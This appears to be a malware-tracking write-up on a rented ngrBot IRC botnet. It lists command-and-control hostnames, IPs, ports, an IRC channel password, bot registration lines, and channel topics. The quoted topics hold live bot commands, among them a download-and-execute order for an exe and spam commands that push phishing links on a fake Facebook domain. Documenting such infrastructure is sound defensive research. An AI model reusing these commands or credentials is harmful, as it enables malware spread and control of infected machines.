a.xludakx.com (ngrBot hosted in France, Paris, Gandi, around 80k)

Very big IRC botnet, now for rent and hosted in France.

Resolved : [a.xludakx.com] To [92.243.27.72]
92.243.27.72 5900 leaf nr4
92.243.17.156 5900

resolved [b.xludakx.com] to (92.242.140.48)
resolved [c.xludakx.com] to (92.242.140.48)
resolved [d.xludakx.com] to (92.242.140.48)

Remote Host Port Number
199.15.234.7 80
92.243.26.81 80 PASS ngrBot
92.243.26.81 3212
92.243.20.57 80 leaf nr2

Resolved : [haso.dukatlgg.com] To [92.243.27.178]
haso.dukatlgg.com 80 leaf nr3
UPDATE:
d.dukatlgg.com
Resolved : [d.dukatlgg.com] To [92.243.30.171]
Resolved : [d.dukatlgg.com] To [95.142.165.255]

a.xludakx.com 5900 leaf nr4
Resolved : [a.xludakx.com] To [92.243.27.72]

92.243.0.109:80 PASS ngrBot leaf nr7
92.243.0.109:5900 PASS ngrBot

NICK n{US|XPa}ytbwuav
USER ytbwuav 0 0 :ytbwuav
NICK n{US|XPa}jssdlij
USER jssdlij 0 0 :jssdlij

The second exe file is used to download the msg.txt file with commands for other bots:
DNS Query Text
sat12.fileave.com IN A +

HTTP Queries
HTTP Query Text
http://adf.ly/3DpWf GET /msg.txt HTTP/1.1

msg.txt file content:
YwKCxcStcfSFAHXHVqVQ
U http://adf.ly/3Dp23
0|hahha! http://adf.ly/3DpXX
0|ahhaha^! http://adf.ly/3DpYf
0|heheh^! http://adf.ly/3DpZO

Other DNS names:

Now talking in #DarkSons-01#
Topic On: [ #DarkSons-01# ] [ [Rented By Super] !NAZELup http://x.x.x.x/2darklord.exe 29F6C73E19EC686CAA8E6165D832275A -r ]
Topic By: [ Ludak32 ]

UPDATE:
92.243.20.57:5900 ircd server here

Now talking in #DarkSons-01#
Topic On: [ #DarkSons-01# ] [ [Rented to Super] ]
Topic By: [ MrDD ]
Joins: {RUS|XPa}ttehkla [ttehkla@178.122.1.18]
Joins: {BLR|W7u}xgvtewl [xgvtewl@178.121.62.187]
Joins: {EGY|W7u}djidoui [djidoui@41.206.150.121]
Joins: {RUS|XPa}cgslhuc [cgslhuc@46.216.135.194]

exe files:
http://3a6a8b64.tubeviral.com
http://2f0e5b6f.linkbucks.com

UPDATE:
92.243.27.72:5900
Server Password:
Username: hsxmztw
Nickname: n{DE|XPa}hsxmztw
Channel: ##Redrm-002## (Password: redem)
Channeltopic: :!m on !s -n !j #SPp,#DLx,#UP !j -c UA,UKR #vnc

Now talking in ##Redrm-002##
Topic On: [ ##Redrm-002## ] [ !m on !s -n !j #SPp,#DLx,#UP !j -c UA,UKR #vnc ]
Topic By: [ kuklkiljkl ]

Now talking in #SPp
Topic On: [ #SPp ] [ !mod usbi on !mod msnu off !msn.int 3 !msn.set :O hahaha! http://www.facebook.com.img092.tk/Photo-#########.jpeg !http.int 4 !http.set 😉 hehehe! http://www.facebook.com.img092.tk/Photo-#########.jpeg ]
Topic By: [ kuklkiljkl ]

Other URLs from downloader:
ze.pusikuracbre.com port 8332
Resolved : [ze.pusikuracbre.com] To [46.4.116.147]
Resolved : [ze.pusikuracbre.com] To [188.40.92.153]
Resolved : [ze.pusikuracbre.com] To [176.9.42.247]
Resolved : [ze.pusikuracbre.com] To [188.40.93.82]
Data posted to URLs
http://176.9.42.247/ (ze.pusikuracbre.com)

Outgoing connection to remote server: ze.pusikuracbre.com TCP port 8332

UPDATE:
Remote Host Port Number
199.15.234.7 80
92.243.10.12 5900 PASS ngrBot
92.243.24.196 5900 PASS ngrBot

NICK n{US|XPa}xktjxkq
USER xktjxkq 0 0 :xktjxkq
JOIN ##Redrm-002## redem

Hosting info:
http://whois.domaintools.com/92.243.26.81
